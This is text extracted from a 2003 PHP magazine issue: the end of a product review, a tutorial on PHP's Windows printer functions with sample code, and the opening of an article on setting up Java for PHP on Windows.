PRODUCT REVIEW • a common look and feel for applications • a multitasking desktop interface, through the browser • the help desk manager (a bug tracking tool) - The tracker is also available outside of the system (at a regular website) so users experiencing difficulties logging in to the system, etc. can still access it • the help center (a system help utility) • a calculator application • a calendar application • a standard text editing application • a file manager application Probably the best thing from an end-user perspective is that it offers a low bar of entry to developing your own simple custom applications. The application builder doesn’t require a degree in computer science to operate, and mixing it up with report builder and page builder is not difficult. Hardcore developers would develop an application using application builder, and then hack it up, but I see no reason that non-program-
mers couldn’t still build complex and complete applications without writing any code. On the horizon Lumen Software is constantly working on making this system more self-contained, so that the enduser doesn’t need anything more than a web browser on their computer. With the addition of two new applications in the near future, they are taking big steps in that direction. The source code editor, whose release is planned inside of the next month, will feature full integration with the SQL editor. It will also contain a large assortment of other features to make it easier to develop applications for the system. Another development planned soon is a built-in word processing application. Considering how usable their desktop and other applications are, I’m sure this will be a really interesting and useful addition to the family. What I liked I’m going to say this up front, because it needs to be said: this system is cool. From a developer’s
Figure 2
September 2003
●
PHP Architect
●
www.phparch.com
50
PRODUCT REVIEW perspective, it is an incredible feat. When you consider the lofty goals they’ve set, and the system that has resulted, they must have some very intelligent and dedicated people working on it. The first thing that stood out to me the most was the speed of the system. Even seemingly complex applications usually loaded sub-second, even with the overhead that I’m sure the virtual desktop and all the Javascript incurs. I never waited more than a second, maybe two, for a page. The second thing was the usability. The GUI interface that the Lumenation middleware provides to applications is intuitive and is a solid implementation of the desktop metaphor. The user experience is amazing, especially when you consider that you are using nothing but a browser. Task switching, files on the desktop, right clicking functionality – pretty cool. The built-in developer applications (page builder, application builder, report builder, data dictionary) are very cool. They work very well and consistently, and are excellent tools for developing large or small applications. The data dictionary is especially good, as it allows you to do things like auto-discovery of database layouts. The code generated by application builder is very easy to understand and augment. Lumen Software Pricing 8/25/03
Lumen Solutions can be purchased as software solutions or as bundled solutions on optimized hardware from IBM, Gateway, and Toshiba. Prices here reflect software solutions only. For pricing on a bundled solution including an optimized server, please contact Lumen Sales at: 509-455-6720. LightBulb Suite: Lumenation Middleware Environment One Developer License Software Development Kit Data Dictionary Query Builder Web Content Manager *Additional Developer Licenses
$590.00
$395.00 per Developer
User Licenses Standard User Licenses are for all
$12.00 per User
Modules Modules can be purchased to complement the functionality of the LightBulb Suite as an add-on solution or as freestanding products. Development: Web Content Management System Report Management System for Developers Productivty: CRM HelpDesk Manager Calendar Enterprise Report Management System
Add-On $395.00 $395.00
Freestanding $590.00 $590.00
$495.00 $495.00 $495.00 $495.00
$690.00 $690.00 $690.00 $690.00
The user management system is easy to hook up to, and offers a great deal of flexibility, working at the application and data levels. The source code revision control feature is pretty cool. It is very basic, but at least it’s there. You have the automatic ability to rollback to a previous version of your code, and its all handled pretty much seamlessly. What I didn’t like The biggest downside that I can see now is the sole support for Mozilla. I can understand why they did it, since Mozilla runs on just about anything, and is much more compliant than something like IE, but moving into larger corporate networks might offer a different reality. Often users are given a drive image, and that’s what they get. The less the IT department has to maintain, the better. Having to install extra, “special” software on everybody’s machine in a large corporate environment might pose additional challenges (although they’d have to do this if they were using something like Citrix Metaframe, so maybe it’s a non-issue...). Still, the browser dependency bugs me. The source control is very basic. It offers rollbacks, but no comparisons, etc. Sure, if you have access to the server, you could go down to system level and do a diff, but it wouldn’t be hard to wrap a system command like that, it would offer a world of difference in the source control system. Creating more complex applications than the builders can create requires that you modify the code that comes out of the application builder, and there is no good way to do that in the system. I did not find the text editor to be very reliable, and the code editor is still a few weeks off. To modify the code, you are pretty much forced to dive down to system level, and use your favorite editor. Wrapping Up I really don’t think I can do a system like this justice in a short little article like this. Browse over to Lumen’s website (http://www.lumensoftware.com), and have a look at Lumenation and LightBulb – see what they can do for you. I can think of lots of uses in lots of sectors, and I think there are significant amounts of money to be saved by adopting a system like this. I’m giving them a 4 out of 5 for a great product.
This information reflects Lumen's pricing as of August 25th, 2003. Lumen retains the right to change or modify its pricing at its discretion.
php|a September 2003
●
PHP Architect
●
www.phparch.com
51
Printing with PHP
F E A T U R E
by Alessandro Sfondrini
Introduction The PHP printer functions were introduced in PHP 4.0.4, and they only work under the Microsoft Windows operating system. The most commonly confused fact about these functions is that the printer must be connected to the server (or be a printer on the server's network), not to the client. These printer functions may be very useful in an intranet; for instance, if we have to print lots of similar letters (like the Microsoft Word mail merge function does), the dump of a database, or some data a user has sent us from a form. We can also print to a file using software like Adobe Acrobat Distiller or Adobe Acrobat PDFWriter. There are lots of other uses; these are just some of the common ones. There are mainly two different ways to print with PHP. The easiest one is to print in plain text, and may often be enough. The other is to print in formatted text, and this is more complex. We will have to set each line of text's coordinates, while to print a table we will have to draw lines and rectangles. Don't be afraid – it isn't so hard! In this article, we'll take a look at the most important printer functions, write an application to print some form data as unformatted text, and write another application to print out data from a database table and print it using tables and formatted text. Installation To use the printer functions we only have to add (or uncomment) this line in the php.ini file: September 2003
●
PHP Architect
●
www.phparch.com
extension=php_printer.dll
We can also set a default printer in the php.ini file using its name as it is displayed in your Windows printers folder. To do this simply add or edit this line: printer.default_printer = "My Printer Name"
This isn't required, but it's strongly recommended because it will help us to keep our code cleaner. We can also use ini_set() to set it: ini_set('printer.default_printer', 'My Printer Name');
If we want to use a network printer, we only have to write this: printer.default_printer = "\\\My PC Name\My Printer Name"
REQUIREMENTS PHP: 4.0.4+ w/ php_printer.dll enabled OS: Windows 9x/ME/NT/2000/XP Applications: MySQL 3.x+ Code Directory: printer
52
FEATURES
Printing with PHP
Now that we have set up our php.ini file, we can analyze some of the basic functions that we'll need to print any kind of text. Basic functions Generally, we can work with the printer functions similarly to database or file functions. We first open a connection to a printer and create a document in the spooler, then we print whatever we need and close the connection. We mustn't forget to use the connection handle where it's needed, because it can't be omitted. Let's look at some functions.
bool printer_end_page (resource handle)
This function ends the current page. It must be used after printer_start_page(). void printer_abort (resource handle)
This function deletes the printer spool file and aborts the printing process. bool printer_set_option (resource handle, int option, mixed value)
mixed printer_open ([string devicename])
This function opens the connection to a printer, specified in devicename, and returns the connection handle. This handle is needed to use most of the printer functions. If no device name is passed in, the default printer specified in the php.ini file is used. void printer_close (resource handle)
This function closes the connection to the printer. bool printer_start_doc (resource handle[, string documentname])
This function starts a document, and adds it to the printer spooler. We have to use this function every time we want to print. If we want to print to a file, we must specify documentname, which will became the file's name. If no documentname is passed in, the output file will be named “PHP Generated Document”.
bool printer_end_doc (resource handle)
This function closes the document in the printer spooler, and sends it to the printer. bool printer_start_page (resource handle)
This function starts a new page. It's always required with printer_draw_*() functions, as we'll see, but it also may be needed with printer_write() if you use a modern printer.
September 2003
●
PHP Architect
●
www.phparch.com
This function is important, and is used to set many different printer options. It works similarly to ini_set(). Here are the options we may need to set: • PRINTER_COPIES: how many copies should be printed. • PRINTER_MODE: the type of data; value must be “TEXT”, “RAW” or “EMF”. • PRINTER_RESOLUTION_X, PRINTER_RESOLUTION_Y: specifies the X or Y resolution in DPI. If you use an old printer, this option may not work. • PRINTER_PAPER_FORMAT: specifies the paper format. The value can be one of the following constants: • PRINTER_FORMAT_LETTER: standard letter format (8.5x11 inches) • PRINTER_FORMAT_LETTER: standard legal format (8.5x14 inches) • PRINTER_FORMAT_A3: standard A3 format (297x420 millimeters) • PRINTER_FORMAT_A4: standard A4 format (210x297 millimeters) • PRINTER_FORMAT_A5: standard A5 format (148x210 millimeters) • PRINTER_FORMAT_B4: standard B4 format (250x354 millimeters) • PRINTER_FORMAT_B5: standard B5 format (182x257 millimeters) • PRINTER_FORMAT_FOLIO: standard FOLIO format (8.5x13 inches) • PRINTER_FORMAT_CUSTOM: lets you specify a custom paper format. You can set it using • PRINTER_PAPER_LENGTH and PRINTER_PAPER_WIDTH (value must be an integer in
53
FEATURES
Printing with PHP
millimeters) • PRINTER_TEXT_COLOR: specifies text color; value must be a string containing the RGB information in hex format, e. g. "0000FF". • PRINTER_BACKGROUND_COLOR: specifies the background color; like in the previous case value must be a string containing the RGB information in hex format. • PRINTER_TEXT_ALIGN: specifies the text alignment; if you use an old printer, this option may not work. value can be one of the following constants: • PRINTER_TA_BASELINE: aligned at the base line. • PRINTER_TA_BOTTOM: aligned at the bottom. • PRINTER_TA_TOP: aligned at the top. • PRINTER_TA_CENTER: aligned at the center. • PRINTER_TA_LEFT: aligned at the left. • PRINTER_TA_RIGHT: aligned at the right. • PRINTER_SCALE: specifies the factor by which the printed output should be scaled. The page size is scaled from the physical page size by a factor of value/100. For example if you set the scale to 50, the output would be half of it's original size. Value must be an integer. If you use an old printer, this option may not work. mixed printer_get_option (resource handle, string option)
Returns the value of option. option can be one of the constants described above. This function is very useful when you want to know things like the printer resolution in dots per inch. bool printer_write (resource handle, string content)
This function writes RAW data to the printer. It can be used to easily print plain text, but we must set PRINTER_MODE to RAW, first. This function is very easy to use because it accepts special chars like “\n\r”, “\t”, etc. and, with some printers, automatically prints new pages if it is needed (with most of modern ones you must start and end each page
September 2003
●
PHP Architect
●
www.phparch.com
manually with printer_start_page() printer_end_page()).
and
Printing colored text When we print any kind of text we can set its color just as we set its size or weight. To print colored text we use printer_set_option() to set PRINTER_TEXT_COLOR to the RGB value for the required color. This color will be used to print the whole document, so if we want to use different colors, we must set them each time. A simple application: Print form data using printer_write() Here is our first example application. Let's suppose we want to print some data that a user has sent us from a form. He's just ordered a book from our website, and we want to print a copy of the order. Of course, this user should be in a restricted area, and would be likely be sending us data in $_POST or $_SESSION arrays. This is not important in order to use printer functions, though, so let's imagine we have already written all the code we may need to authenticate the user and check those arrays. Let's look at the first part of Listing 1. First, we set some vars – the ones that the user could send us. I used $varname instead of $_POST[“varname”] to indicate them in the interests of brevity. Next, we write the text to print in the $text var. Note that it is plain, unformatted text but we can use special chars like newline or tab. To insert a newline we must use “\n\r”, not only “\n”, or there will be no carriage return and the new line will start directly below the position on the line where the previous one ends. Remember we always have to end each line manually. We can now open a connection to the printer to print the text. We must first set the printer mode to “RAW” using printer_set_option() , as this is required to use printer_write(). Most complex functions used to print formatted text require “TEXT” mode, so modern printers default to “TEXT” mode. We may need to start the page using printer_start_page() before writing text and end it with printer_end_page(). As we said it depends on your printer: older printers don't need these functions, but the modern ones do. The only way to check out how it works is by running some test code like this. In our example the functions are included: comment the lines if you need to. Now we can send the text to the printer using printer_write(). Remember that this function
/* We set some vars that an user could have sent us */ /* If this was a real application they would be cointaned in $_POST */ $name = “John Smith”; $address = “1, This Street”; $city = “Toronto”; $country = “Canada”; $creditcardno = “123456789-ABC”; $title = “How to use PHP printer functions”; $price = “10.00 USD”; $isbn = “12-345-6789-X”; /* Now we write the text to print */ $text = “\t\t\tBOOK ORDER”; // We can use tabulation special char $text .= “\n\r\n\r\n\r\n\r\n\r”; // And new line ones $text .= “We received this order “.date(“l, M dS Y”).” at “.date(“H:i:s”).”\n\r\n\r”; $text .= “From $name\n\r\n\r”; $text .= “Address: $address - $city, $country\n\r\n\r”; $text .= “Credit card number: $creditcardno\n\r\n\r\n\r\n\r”; $text .= “The book ordered is the following:\n\r\n\r”; $text .= “Title: $title\n\r”; $text .= “ISBN code: $isbn\n\r\n\r”; $text .= “Price: $price”; /* And we print it */ $handle = printer_open(); // Opens the connection printer_set_option($handle, PRINTER_MODE, “RAW”); // Sets the printer mode printer_start_doc($handle, “Book order”); // Creates the document and sets its title printer_start_page($handle); // Starts the page. This function is only needed with modern printers. printer_write($handle, $text); // Prints the text printer_end_page($handle); // Ends the page. This function is only needed with modern printers. printer_end_doc($handle); // Closes the document printer_close($handle); // Closes the connection
/* —- SECOND PART
—- */
/* First we connect to the DB */ $conn = mysql_connect(); mysql_select_db(‘mydbname’); $res = mysql_query(“SELECT * FROM products ORDER BY id ASC”, $conn); mysql_close($conn); /* Then we set-up printer functions & tools */ $handle = printer_open(); printer_start_doc($handle,’Dumping data from products’); printer_start_page($handle); $x = printer_get_option($handle, PRINTER_RESOLUTION_X) / 300; // Gets X res $y = printer_get_option($handle, PRINTER_RESOLUTION_Y) / 300; // And Y res /* $bigtitle is an ultrabold big font */ $bigtitle = printer_create_font(‘Comic Sans MS’, 140*$y, 60*$x, PRINTER_FW_ULTRABOLD, false, false, false, 0); /* $smalltitle is a bold medium font */ $smalltitle = printer_create_font(‘Times New Roman’, 70*$y, 30*$x, PRINTER_FW_BOLD, false, false, false, 0); /* $font is a small font we can use to write into the table */ $font = printer_create_font(‘Times New Roman’, 45*$y, 15*$x, PRINTER_FW_MEDIUM, false, false, false, 0); /* $pen in the pen we’ll use to draw table borders */ $pen = printer_create_pen(PRINTER_PEN_SOLID, 1, “000000”); /* Now we print the titles */ printer_set_option($handle, PRINTER_TEXT_COLOR, “FF0000”); // Sets text color printer_select_font($handle, $bigtitle); // Selects the font printer_draw_text($handle, “Our avialable products”, 50*$x, 50*$y); // Writes the title printer_delete_font($bigtitle); // Deletes the font /* Now we’ll repeat the operation */ printer_set_option($handle, PRINTER_TEXT_COLOR, “000000”); // Sets color to black printer_select_font($handle, $smalltitle); printer_draw_text($handle, “Backup of table ‘products’.”, 50*$x, 220*$y); printer_draw_text($handle, “Date: “.date(“r”), 50*$x, 300*$y); printer_delete_font($smalltitle); ?>
September 2003
●
PHP Architect
●
www.phparch.com
55
FEATURES
Printing with PHP
sends data directly to the printer, not to the printer spooler. Finally, we close the document and the connection to the printer. That was very simple, wasn't it? We had to write only eight lines of code to print our order information! What we did here can only be used to print plain text, though, and we've had to set each line end manually (even if it was empty). To print nicely formatted text, images, and drawings we must use the more complex printer functions. Complex printer functions An important difference to remember is that to print formatted text or images we have to use coordinates and always open and close each page of the document. If we want to print text using fonts, we must create them. Once the fonts are created, we can select them in turn and write out the text for that font. mixed printer_create_font (string face, int height, int width, int font_weight, bool italic, bool underline, bool strikeout, int orientation)
This function creates a font and returns a font handle. This function is very important, so we'd better analyze it in-depth. Here's a list of the parameters to it and what they mean. • string face: the name of the font, like “Arial”, “Times New Roman”, etc. • int height: font height in dots. • int width: font width in dots. • int font_weight: font weight. We can use these constants to indicate the font weight: • PRINTER_FW_THIN: thin (100) • PRINTER_FW_ULTRALIGHT: ultra light (200) • PRINTER_FW_LIGHT: light (300) • PRINTER_FW_NORMAL: normal (400) • PRINTER_FW_MEDIUM: medium (500) • PRINTER_FW_BOLD: bold (700) • PRINTER_FW_ULTRABOLD: ultra bold (800) • PRINTER_FW_HEAVY: heavy (900) • bool italic, bool underline, bool strikeout: use TRUE or FALSE to to set each of these attributes. • int orientation: the rotation of the
September 2003
●
PHP Architect
●
www.phparch.com
text. Normal text has orientation = 0. Remember that orientation has to be multiplied by 10, so to print a 90° rotation you must set orientation to 900. Signed integers can be used, too – positive integers to rotate left, negative ones to rotate right. void printer_select_font (resource printer_handle, resource font_handle)
This function selects a font. We must create the font first, using printer_create_font(), and when we start a new page we have to select the font again. bool printer_delete_font (resource handle)
This function deletes a font. void printer_draw_text (resource printer_handle, string text, int x, int y)
This function writes the text to the printer spooler. This is the equivalent of printer_write(), but works with formatted text. The variables x and y are the coordinates, in dots, where the line will start. We can't use “\r\n” or other special characters to write a newline anymore. We must write each line separately, changing its coordinates. void printer_draw_bmp (resource handle, string filename, int x, int y)
This function draws an image at position x, y. The image must be a bitmap, but we can easily convert a JPEG to BMP using the GD library. To use absolute paths, we must specify them in Windows format. A valid absolute path is "c:\\folder\\image.bmp". Setting up drawing tools We may need to draw lines (e.g. to print a table), geometric shapes or pie graphs. Doing this isn't so different from formatting text. First, we must create some pens and brushes (instead of fonts) to draw and fill drawings with color. Then we can select the ones we need in turn, and draw lines, rectangles or ellipses, using x and y coordinates. mixed printer_create_pen (int style, int width, string color)
56
FEATURES
Printing with PHP
This function creates a pen that we can use to draw lines or curves, and returns a handle to it. The width parameter specifies the width of the line, color specifies the color in RGB hex format (e.g. “0000FF”) and style must be one of the following constants: • • • •
PRINTER_PEN_SOLID: solid pen PRINTER_PEN_DASH: dashed pen PRINTER_PEN_DOT: dotted pen PRINTER_PEN_DASHDOT: pen with dashes and dots • PRINTER_PEN_DASHDOTDOT: pen with dashes and double dots • PRINTER_PEN_INVISIBLE: invisible pen mixed printer_create_brush (int style, string color)
This function creates a brush that we can use to fill drawings with colors or images, and returns a handle to it. The color parameter specifies the color in RGB hex format. The style parameter must be one of the following constants: • PRINTER_BRUSH_SOLID: brush with a solid color • PRINTER_BRUSH_DIAGONAL: brush with a 45-degree upward left-to-right hatch ( /) • PRINTER_BRUSH_CROSS: brush with a cross hatch ( + ) • PRINTER_BRUSH_DIAGCROSS: brush with a 45-degree cross hatch ( x ) • PRINTER_BRUSH_FDIAGONAL: brush with a 45-degree downward left-toright hatch ( \ ) • PRINTER_BRUSH_HORIZONTAL: brush with a horizontal hatch ( – ) • PRINTER_BRUSH_VERTICAL: brush with a vertical hatch ( | ) • PRINTER_BRUSH_CUSTOM: custom brush from an BMP file. The second parameter is used to specify the BMP instead of the RGB color code.
These functions delete a pen or a brush. Using drawing tools Here are some of the drawing functions we can use after we've created and selected a pen and a brush. Note that to draw lines we don't need any brush. void printer_draw_line (resource printer_handle, int from_x, int from_y, int to_x, int to_y)
This function draws a line from from_x, from_y to to_x, to_y. void printer_draw_rectangle (resource handle, int ul_x, int ul_y, int lr_x, int lr_y)
This function simply draws a rectangle. The ul_x and ul_y are the upper-left coordinates of the rectangle, while lr_x and lr_y are the lower-right ones. void printer_draw_ellipse (resource handle, int ul_x, int ul_y, int lr_x, int lr_y)
This function draws an ellipse. Like printer_draw_rectangle(), the ul_x, ul_y, lr_x and lr_y parameters are the upper left and the lower right coordinates. void printer_draw_pie (resource handle, int rec_x, int rec_y, int rec_x1, int rec_y1, int rad1_x, int rad1_y, int rad2_x, int rad2_y)
This function draws a pie. The rec_x, rec_y, rec_x1 and rec_y1 are the upper left and lower right coordinates of the bounding rectangle. The rad1_x and rad1_y parameters are the coordinates of the first radial's ending; rad2_x and rad2_y are the coordinates of the second one. A complex application: Dumping data from a DB table. In this example, we need to print a hard copy backup of some important data contained in a database table. We won't print it as plain text, because our customer prefers cool, formatted text. I say that this is a *complex* application only because we use the complex printer functions. We'll create an application which:
57
FEATURES
Printing with PHP
• extracts data from the table (we'll use a MySQL DB); • prints on an A4 sheet a colored title; • prints a table header and the data we've extracted from the table; • automatically prints new pages if needed and repeats table header. The table is named products, contains 400 records and has the following structure: CREATE TABLE products ( id smallint(3) unsigned NOT NULL PRIMARY KEY auto_increment, prodname varchar(60) NOT NULL, prodid varchar(10) NOT NULL, price float NOT NULL, qty tinyint(3) unsigned NOT NULL );
the $x and $y vars. We'll also assume that the printable area of an A4 sheet is about 2200x3200 dots at 300 DPI. Now we create some fonts and a pen. We'll use the pen to draw a table, $bigtitle and $smalltitle to write the page titles and $font to write the text contained in the table. We set the pen width to '1', rather than '1*$x', because in this case maintaining resolution ratio is not so important. Moving on to the drawing, we first have to draw the bigger title, so we set PRINTER_TEXT_COLOR and select the $bigtitle font. We can now draw the title at the top of the page. After we've drawn that, we can delete the font and set the text color to black. Now we can select the $smalltitle font, draw the second title, and delete the font. Before drawing the table, let's think about its size. We can find each column's width using this formula:
Here is a description of each field of the table: • id: a progressive integer. • prodname: the name of the product. • prodid: an alphanumeric string which identifies the product. • price: the price of the product. • qty: the quantity available. The data contained in this table was inserted by repeating the following query 400 times (using a for loop): INSERT INTO products VALUES ( '', 'Here is the name of the product. It can be 60 chars long.', 'ABC-1234-X', '149.99', '6' );
Taking a look at Listing 2, we first extract data from the table ordered by id and store the result handle in the $res var. We will later use mysql_fetch_array() to obtain each record. Next, we connect to the printer, open a new document and a new page, and get the printer resolution. We'll need the printer resolution so that we can use the same application with different printers and resolutions, but still draw everything the same physical size. Coordinates and font sizes are in dots, which may be of vastly different size on different printers. When building our pages, we'll assume our printer has a 300 DPI resolution, which means that we must multiply each value we set by (real X or Y resolution / 300) to scale it properly. This ratio is stored in
We should also sum the border width, but in this case we've set it to one dot, so we can ignore it. Note that we multiply the character width by 4/3 because uppercase characters are bigger. This means that the real character average width will be 4/3*15=20 (15 is the width we set the font to in printer_create_font()). We'll set horizontal cell padding to 20 dots. The first column of our table contains a 3-digit integer. Its width must be 20*3+20*2 = 100 dots (This is three characters and the left and right cell paddings). The second column (“product name”) can contain 60 characters, so its width will have to be 1240 dots. The “product id” column will take 240 dots, the "price" column will take about 180 dots, and the last column can take 100 dots. This means that the width of each row must be a total of 1860 dots and its height must be about 80 dots (The height of our font was specified at 45 dots, plus the top and bottom cell paddings). The upper left coordinates of the table will be (200, 400), the upper right ones (2060, 400). The Y position of the next row border will be 400+80 = 480. The Y position of the text contained inside the rows will be equal to border Y pos. + vertical cell padding: for the first row it will be 400+15 = 415, for the second one 480+15 = 495, and so on. Now let's read the rest of Listing 2. We first select $pen and $font, then set some vars. In the $x_pos array we store the X positions of table borders multiplied by $x to preserve the scale. We'll use it to draw the table border (ver-
printer_select_pen($handle, $pen); // Selects $pen printer_select_font($handle, $font); // And $font $x_pos = array (200*$x, // We store in this array the X pos 300*$x, // Of each column border. 1540*$x, // We’ll use them to draw table borders. 1780*$x, 1960*$x, 2060*$x); $x_txt = array (220*$x, // We store in this array the X pos 320*$x, // Of the text in each column. 1560*$x, // We’ll use them to write text inside table cells 1800*$x, 1980*$x); $y_pos = 400*$y; // Sets Y position $y_txt = $y_pos + 15*$y; // Sets Y text position $page = 1; // Sets page number /* Writes the header of the table */ printer_draw_line($handle, $x_pos[0], $y_pos, $x_pos[5], $y_pos); printer_draw_text($handle, printer_draw_text($handle, printer_draw_text($handle, printer_draw_text($handle, printer_draw_text($handle,
$y_pos += 80*$y; // Increments $y_pos $y_txt = $y_pos + 15*$y; // Resets Y text position if ($y_pos >= 3200*$y) // If reaches the end of the page { printer_draw_line($handle, $x_pos[0], $y_pos, $x_pos[5], $y_pos); // Closes the table printer_draw_text($handle, “Page $page”, 2080*$x, 40*$y); // Writes page number ($page == 1)? $y_start=400*$y : $y_start=50*$y; // If this is the 1st page vertical lines // starts from 400, else from 50 /* Draws verical lines */ printer_draw_line($handle, $x_pos[0], printer_draw_line($handle, $x_pos[1], printer_draw_line($handle, $x_pos[2], printer_draw_line($handle, $x_pos[3], printer_draw_line($handle, $x_pos[4], printer_draw_line($handle, $x_pos[5],
printer_end_page($handle); // Closes this page printer_start_page($handle); // And starts a new one printer_select_font($handle, $font); // Re-selects $font $y_pos = 50*$y; // Resets $y_pos $y_txt = $y_pos + 15*$y; // And Y text position $page++; // Increments page number
/* Writes the header of the table in the new page */ printer_draw_line($handle, $x_pos[0], $y_pos, $x_pos[5], $y_pos); printer_draw_text($handle, “ID”, $x_txt[0], $y_txt); printer_draw_text($handle, “PRODUCT NAME / DESCRIPTION”, $x_txt[1], $y_txt); printer_draw_text($handle, “PROD. ID”, $x_txt[2], $y_txt); printer_draw_text($handle, “PRICE”, $x_txt[3], $y_txt); printer_draw_text($handle, “QTY”, $x_txt[4], $y_txt); $y_pos += 80*$y; // Increments $y_pos $y_txt = $y_pos + 15*$y; // Resets Y text position } } /* When exits the while loop */ printer_draw_line($handle, $x_pos[0], $y_pos, $x_pos[5], $y_pos); // Closes the table printer_draw_text($handle, “Page $page”, 2080*$x, 40*$y); // Writes page number
...Continued on page 60
September 2003
●
PHP Architect
●
www.phparch.com
59
FEATURES
Printing with PHP
tical and horizontal lines). $x_txt array contains the X position of the text contained in table columns, equal to left border X pos. + horizontal cell padding . We'll use this array every time we need to write text inside the table. We use $y_pos to set the Y coordinate where table border starts. In the first page, as we said, its value is 400 dots (at 300 DPI). $y_txt is the Y text position, obtained adding 15 dots to border position; its first value is 415 dots. $page is the page number. Now we can write the table header: we draw an horizontal line at $y_pos (400 dots from top) from $x_pos[0] (200 dots from left) to $x_pos[5] (2060 dots from left). Next, we write the headers of each column at $y_txt (415 dots from top) and using the X values stored in $x_txt array. Finally we increment $y_pos by 80 dots (it will become 480 dots) and reset $y_txt to 480+15 = 495 dots: now we're ready to write a new data row. To write the following rows, we'll repeat these operations in a while loop (we need it to fetch MySQL results): first draw the horizontal line, then write the text, and finally increment $y_pos and reset $y_txt. But before writing the next line we must check if we have reached the end of the page. In fact, there is an if control: if the Y position of the new line is more than 3200 dots (the vertical size of the page) we perform some operations. We close the table drawing the last horizontal line at $y_pos and write the page number on the topright corner of the page. Next, we must check $page (the page number) to find out if it is the first page. In fact, in the first page the table starts at 400 dots from the top (because of titles), and in the others it starts at 50 dots. We store the value of the top Y coord (400 or 50 dots) in $y_start and use it to draw the verListing 2: Continued from page 59 91 92 ($page == 1)? $y_start=400*$y : $y_start=50*$y; // If the document has only one page 93 // starts from 400,else from 50 94 95 /* Draws verical lines */ 96 printer_draw_line($handle, $x_pos[0], $y_start, $x_pos[0], $y_pos); 97 printer_draw_line($handle, $x_pos[1], $y_start, $x_pos[1], $y_pos); 98 printer_draw_line($handle, $x_pos[2], $y_start, $x_pos[2], $y_pos); 99 printer_draw_line($handle, $x_pos[3], $y_start, $x_pos[3], $y_pos); 100 printer_draw_line($handle, $x_pos[4], $y_start, $x_pos[4], $y_pos); 101 printer_draw_line($handle, $x_pos[5], $y_start, $x_pos[5], $y_pos); 102 103 printer_delete_pen($pen); // Deletes $pen 104 printer_delete_font($font); // And $font 105 printer_end_page($handle); // Closes the last page 106 printer_end_doc($handle); // Closes the document 107 printer_close($handle); // Closes the connection 108 ?>
September 2003
●
PHP Architect
●
www.phparch.com
tical lines: each line starts from $y_start (the top of the page) and ends at $y_pos (the end of the page); its X position is stored in $x_pos array. Note that we could simply draw each row separately, including vertical lines, but it would take a lot of time: PHP would have to draw hundreds of short vertical lines, instead of six long ones! Now we close the page and open a new one. Remember that we must re-select the font each time we start a new page! We set $y_pos to 50 dots, reset $y_txt to 65 dots (50+15) and increment $page. Now we can write the table header again. We'll repeat the exact operations done to draw it the first time. Finally we increment again $y_pos and reset $y_txt. PHP will go on executing the while loop until there is no more MySQL data to fetch. When it exits from the while loop, we must end the document: we close the table and write page number just as we have done at the end of each page. We must check the page number before drawing vertical lines because the whole document may have only one page (again, to take into account the titles). Lastly, we can delete $pen and $font, and close the page, the document and the printer connection. The whole application can be relatively slow. To create a 400 record document (11 pages) and send it to the printer spooler, PHP took about 2.9 secs. It isn't an overly long time, and is much less than the default maximum execution time (usually 30 secs). Of course the printer will need a longer time to print, but it doesn't depend on PHP. Conclusions We have just used PHP to print data as plain text and as colored formatted text. In my experience, a simple printer script that is a part of a bigger PHP application can increase the whole application's value and, obviously, its price. I hope that you are now able to use printer functions and take advantage of their great potential. If you need any more info, although I hope this article has been exhaustive, you can take a look at the PHP on-line manual (though it treats this topic quite superficially) or contact me by e-mail.
About the Author
?>
Alessandro Sfondrini is a young Italian PHP programmer from Como. He has already written some on-line PHP tutorials and published scripts on most important Italian web portals. You can contact him at [email protected].
Click HERE To Discuss This Article http://forums.phparch.com/48 60
Installing Java for PHP
F E A T U R E
by Dave Palmer
“I hate this *#$%ing Java #@!&!” You scream out in desperation, as you clinch your fists into tight knots and the cold sweat pours down your brow like some lunatic drug addict; your heart pounds like a jackhammer getting ready to burst through your chest cavity as you begin to weep uncontrollably, falling into the fetal position under your desk. elax dude, you just need to get it configured right, that’s all. Here, maybe I can help. I have spent a great deal of time (and some effort) showing you, our most faithful readers, how Java and PHP can work together in harmony, making your applications pull off what appears to be the impossible (or at least the mildly difficult). But, in my haste and negligence I have left you hanging on how to actually get PHP talking to the JVM (Java Virtual Machine). It is my intention to use this piece to shed some light on this often painful process of configuring PHP so that you may invoke Java classes. Windows users probably haven’t had the same trouble that some of our Linux brethren have come across because, oddly enough, configuring PHP to work with a JVM on Windows is not as troublesome as it can be for our open-source compadres. I will break this article up into two pieces, one slice for the Windows user and the other for the Linux user; that way if you are interested in one or the other you can spare yourself
the tedium of going through something that does not interest you. Pretty sweet eh? Windows Configuration I thought since this is the easier task, I’ll get it over with. Note that I don’t mean to minimize the job of configuring PHP for Java in Windows, as it isn’t as simple as other configuration tasks involved with PHP. Let’s dig into this, shall we? First thing you need is a working version of the JDK (Java Development Kit) or JRE (Java Runtime Environment). For the sake of simplicity and consistency, I am going to highly recommend you use Sun’s JDK for this exercise. I use this vendor's JDK regularly and have had much success in configuring PHP using it. It is also important to note that you should be using version 1.3.x of the JDK. I know it’s tempting to go with the latest and greatest version of everything, but 1.3.x is the safest bet right now. So, you need to point your browser to this URL: http://java.sun.com/j2se/1.3/download.htm
Select the Windows (all languages) SDK version. Once you have that file downloaded (it isn’t terribly small, either), run the executable. This will step you through the installation of the JDK, and will ask you where you want to install your JDK. I would recommend installing it in: C:\jdk1.3
61
FEATURES
Installing Java for PHP
It’s important to NOT install this in a folder that has spaces in the name, and simply installing it off of the root makes for less typing in the php.ini file. Once everything has been installed, confirm that everything is set up properly. Open up a command prompt and type this command:
C:\jdk1.3\jre\bin
You’ll notice three folders: Classic Hotspot Server
C:\>java -version
You should see something like this: java version “1.3.1_07” Java(TM) 2 Runtime Environment, Standard Edition (build 1.3.1_07-b02) Java HotSpot(TM) Client VM (build 1.3.1_07-b02, mixed mode)
If you see something other than that, make sure that c:\jdk1.3\bin is in your PATH environmental variable. Before we move on, I’d like to go over quickly some of the components that are packaged with Java. This is a good idea because the more understanding you have of Java, the easier it will be for you to troubleshoot any potential problems you may have. First, navigate to: C:\jdk1.3\bin
You’ll see a lot of stuff in here. The most important things are these three files: javac.exe java.exe jar.exe
javac.exe is the Java compiler. This program converts your Java source code into Java byte code (a .class file). java.exe is the virtual machine executable that interprets the .class files into machine code, and performs whatever actions you designed your program to perform. jar.exe is a very handy utility to create JAR archive files. JAR files are essentially ZIP files, but are used to package Java classes together. This means if you are distributing your Java application, which may contain any number of class files, properties files and other resources, you can package them into one archive file. The Java Virtual Machine can read the contents of a JAR file (or ZIP file) just by adding the JAR file to your class path. Next place to go snooping around is in:
